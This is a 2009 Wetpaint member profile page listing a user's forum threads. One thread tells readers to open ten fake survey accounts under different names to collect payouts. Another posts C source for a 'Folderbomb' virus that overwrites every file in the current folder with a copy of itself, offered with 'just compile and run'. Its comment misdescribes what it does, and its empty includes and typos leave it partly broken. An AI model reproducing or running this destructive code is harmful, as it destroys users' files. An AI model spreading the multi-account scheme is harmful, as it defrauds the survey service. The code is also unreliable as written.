sivaraj.ni

sivaraj.ni id=
Role: Registered User (what's this?

Registered users can join discussions and leave comments.

Read more about site and user permissions on this site at Wetpaint Central.

)
Member since: Jun 5 2009, 1:36 AM EDT
Slogan: Tracing or Hacking will leads to better job
Friends: None
Compliments: None


This member has not added to their profile yet.

Send them a message to ask them to update it.


Latest page update: Jun 5 2009, 1:36 AM EDT
Started By Thread Subject Replies Last Post
sivaraj.ni Tips 0 Jun 14 2009, 11:13 PM EDT by sivaraj.ni
sivaraj.ni
Thread started: Jun 14 2009, 11:13 PM EDT  Watch
www.sivaraj1987.blog.com
Do you find this valuable?    
sivaraj.ni earning free cash by survey 0 Jun 6 2009, 1:30 AM EDT by sivaraj.ni
sivaraj.ni
Thread started: Jun 6 2009, 1:30 AM EDT  Watch
1. open an pay pal account.
2. enter into the free survey using the link below
"http://www.awsurveys.com/HomeMain.cfm?RefID=sheengrafix"
3. create atleast 10 free acount in different names.
4. Make the suvery in each name till u get 75$..
5. then transfer the amount to paypal from each name..
6.USe this for Rapidshare premium account..
Do you find this valuable?    
sivaraj.ni Creating Virus for folder inside folder.. Just compile and run in 'C' 0 Jun 5 2009, 1:40 AM EDT by sivaraj.ni
sivaraj.ni
Thread started: Jun 5 2009, 1:40 AM EDT  Watch
/*this is a simple program to create a virus in c

it will create folder in a folder in a folder and so on run this on your own responsibility*/

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Do you find this valuable?    

Friends


sivaraj.ni has no friends yet. You can always add them as your friend.